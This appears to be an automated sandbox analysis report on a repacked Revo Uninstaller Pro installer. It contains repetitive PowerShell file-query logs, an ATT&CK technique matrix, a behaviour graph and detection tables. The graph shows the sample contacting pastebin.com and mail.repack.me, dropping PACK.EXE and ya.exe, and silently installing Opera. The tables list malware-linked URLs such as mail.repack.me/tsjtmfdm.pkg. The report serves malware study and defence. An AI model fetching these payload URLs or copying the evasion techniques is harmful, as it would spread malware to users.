      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\runonce.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation BiasJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FECBB8 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,16_2_00FECBB8
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      1
      Deobfuscate/Decode Files or Information
      OS Credential Dumping11
      System Time Discovery
      Remote Services1
      Archive Collected Data
      1
      Web Service
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts12
      Command and Scripting Interpreter
      1
      Component Object Model Hijacking
      1
      Component Object Model Hijacking
      2
      Obfuscated Files or Information
      LSASS Memory4
      File and Directory Discovery
      Remote Desktop Protocol1
      Clipboard Data
      1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      PowerShell
      21
      Windows Service
      1
      Access Token Manipulation
      1
      Software Packing
      Security Account Manager56
      System Information Discovery
      SMB/Windows Admin SharesData from Network Shared Drive11
      Encrypted Channel
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCron21
      Registry Run Keys / Startup Folder
      21
      Windows Service
      1
      DLL Side-Loading
      NTDS231
      Security Software Discovery
      Distributed Component Object ModelInput Capture3
      Non-Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
      Process Injection
      1
      File Deletion
      LSA Secrets2
      Process Discovery
      SSHKeylogging4
      Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
      Registry Run Keys / Startup Folder
      43
      Masquerading
      Cached Domain Credentials31
      Virtualization/Sandbox Evasion
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
      Virtualization/Sandbox Evasion
      DCSync1
      Application Window Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      Access Token Manipulation
      Proc Filesystem1
      Remote System Discovery
      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
      Process Injection
      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
      Regsvr32
      Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
      Rundll32
      Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571786 Sample: Revo.Uninstaller.Pro.v5.3.4.exe Startdate: 09/12/2024 Architecture: WINDOWS Score: 44 114 pastebin.com 2->114 116 trn.lb.opera.technology 2->116 118 17 other IPs or domains 2->118 132 Multi AV Scanner detection for dropped file 2->132 134 Possible COM Object hijacking 2->134 136 AI detected suspicious sample 2->136 138 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->138 13 Revo.Uninstaller.Pro.v5.3.4.exe 67 138 2->13         started        18 ruplp.exe 2->18         started        signatures3 140 Connects to a pastebin service (likely for C&C) 114->140 process4 dnsIp5 128 pastebin.com 104.20.3.235, 443, 49736 CLOUDFLARENETUS United States 13->128 130 mail.repack.me 194.87.189.43, 443, 49737 AS-REGRU Russian Federation 13->130 104 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 13->104 dropped 106 C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32 13->106 dropped 108 C:\Users\user\AppData\Local\...\System.dll, PE32 13->108 dropped 110 15 other files (8 malicious) 13->110 dropped 148 Creates an undocumented autostart registry key 13->148 150 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->150 152 Sample is not signed and drops a device driver 13->152 20 cmd.exe 13->20         started        22 rundll32.exe 4 2 13->22         started        26 RevoUninPro.exe 16 5 13->26         started        28 3 other processes 13->28 file6 signatures7 process8 file9 30 PACK.EXE 20->30         started        34 conhost.exe 20->34         started        82 C:\Windows\system32\...\revoflt.sys (copy), PE32+ 22->82 dropped 84 C:\Windows\System32\drivers\SETB88F.tmp, PE32+ 22->84 dropped 142 Creates an autostart registry key pointing to binary in C:\Windows 22->142 36 runonce.exe 2 22->36         started        signatures10 process11 file12 112 C:\Users\user\AppData\Local\Temp\...\ya.exe, PE32 30->112 dropped 154 Multi AV Scanner detection for dropped file 30->154 156 Suspicious powershell command line found 30->156 38 ya.exe 30->38         started        43 powershell.exe 30->43         started        45 powershell.exe 30->45         started        47 powershell.exe 30->47         started        49 grpconv.exe 36->49         started        signatures13 process14 dnsIp15 120 trn.lb.opera.technology 107.167.96.30, 443, 49824, 49857 IOFLOODUS United States 38->120 86 C:\Users\user\Downloads\OperaSetup.exe, PE32 38->86 dropped 88 C:\Users\user\AppData\Local\...\System.dll, PE32 38->88 dropped 90 C:\Users\user\AppData\Local\...\INetC.dll, PE32 38->90 dropped 92 C:\Users\user\AppData\...\OperaSetup[1].exe, PE32 38->92 dropped 144 Multi AV Scanner detection for dropped file 38->144 51 OperaSetup.exe 38->51         started        146 Loading BitLocker PowerShell Module 43->146 54 conhost.exe 43->54         started        56 conhost.exe 45->56         started        58 conhost.exe 47->58         started        file16 signatures17 process18 file19 80 C:\Users\user\AppData\Local\...\setup.exe, PE32 51->80 dropped 60 setup.exe 51->60         started        process20 dnsIp21 122 submit-trn.osp.opera.software 107.167.125.189, 443, 49851, 49859 OPERASOFTWAREUS United States 60->122 124 na-download.opera.com 107.167.96.36, 443, 49858 IOFLOODUS United States 60->124 126 2 other IPs or domains 60->126 96 Opera_installer_2412091654075368040.dll, PE32 60->96 dropped 98 C:\Users\user\AppData\Local\...\setup.exe, PE32 60->98 dropped 100 C:\Users\user\AppData\Local\...\opera_package, PE32 60->100 dropped 102 Opera_115.0.5322.7...toupdate_x64[1].exe, PE32 60->102 dropped 64 setup.exe 60->64         started        67 setup.exe 60->67         started        69 setup.exe 60->69         started        file22 process23 file24 74 Opera_installer_2412091654101308068.dll, PE32 64->74 dropped 71 setup.exe 64->71         started        76 Opera_installer_2412091654079011640.dll, PE32 67->76 dropped 78 Opera_installer_2412091654087472252.dll, PE32 69->78 dropped process25 file26 94 Opera_installer_2412091654106048056.dll, PE32 71->94 dropped

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      Revo.Uninstaller.Pro.v5.3.4.exe17%ReversingLabsWin32.Malware.Nemesis
      SourceDetectionScannerLabelLink
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll0%ReversingLabs
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe0%ReversingLabs
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe0%ReversingLabs
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exe0%ReversingLabs
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe0%ReversingLabs
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exe0%ReversingLabs
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sys2%ReversingLabs
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sys0%ReversingLabs
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.del (copy)0%ReversingLabs
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sys0%ReversingLabs
      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe0%ReversingLabs
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\tsjtmfdm[1].pkg30%ReversingLabs
      C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654075368040.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654079011640.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654087472252.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654101308068.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654106048056.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\PACK.EXE30%ReversingLabs
      C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe25%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\INetC.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\LangDLL.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\System.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\nsDialogs.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\nsExec.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nsyB8DA.tmp\INetC.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nsyB8DA.tmp\System.dll0%ReversingLabs
      C:\Windows\System32\drivers\SETB88F.tmp0%ReversingLabs
      C:\Windows\system32\DRIVERS\revoflt.sys (copy)0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http:////file:////www.web.OS0%Avira URL Cloudsafe
      https://mail.repack.me/y0%Avira URL Cloudsafe
      https://mail.repack.me/tsjtmfdm.pkgo0%Avira URL Cloudsafe
      https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new0%Avira URL Cloudsafe
      http://autoupdate-staging.services.ams.osa/netinstallervwindows?&One0%Avira URL Cloudsafe
      https://legal.opera.com/terms0%Avira URL Cloudsafe
      http://localhost:3001api/prefs/?product=$1&version=$2..0%Avira URL Cloudsafe
      http://www.mirage-systems.de/tq0%Avira URL Cloudsafe
      http://www.mirage-systems.de/Q0%Avira URL Cloudsafe
      http://crl.microsoftRR0%Avira URL Cloudsafe
      http://www.mirage-systems.de/a0%Avira URL Cloudsafe
      https://www.revouninstallerpro.com/db/ilogs/Uninstaller0%Avira URL Cloudsafe
      https://crashpad.chromium.org/0%Avira URL Cloudsafe
      http://www.animation.arthouse.org0%Avira URL Cloudsafe
      https://sourcecode.opera.com0%Avira URL Cloudsafe
      https://gamemaker.io)0%Avira URL Cloudsafe
      http://www.Licence-Protector.com0%Avira URL Cloudsafe
      https://mail.repack.me/0%Avira URL Cloudsafe
      https://www.revouninstallerpro.com/db/ilogs/.ruelDelete0%Avira URL Cloudsafe
      https://mail.repack.me/rosoft0%Avira URL Cloudsafe
      http://www.mirage-systems.de/%operationName%0%Avira URL Cloudsafe
      http://www.vsrevogroup.com0%Avira URL Cloudsafe
      https://mail.repack.me/tsjtmfdm.pkg0%Avira URL Cloudsafe
      https://legal.opera.com/terms.0%Avira URL Cloudsafe
      https://crashpad.chromium.org/bug/new0%Avira URL Cloudsafe
      http://www.mirage-systems.de/0%Avira URL Cloudsafe
      http://repacks.ddns.nethttps://repack.me/ad.htmlopen0%Avira URL Cloudsafe
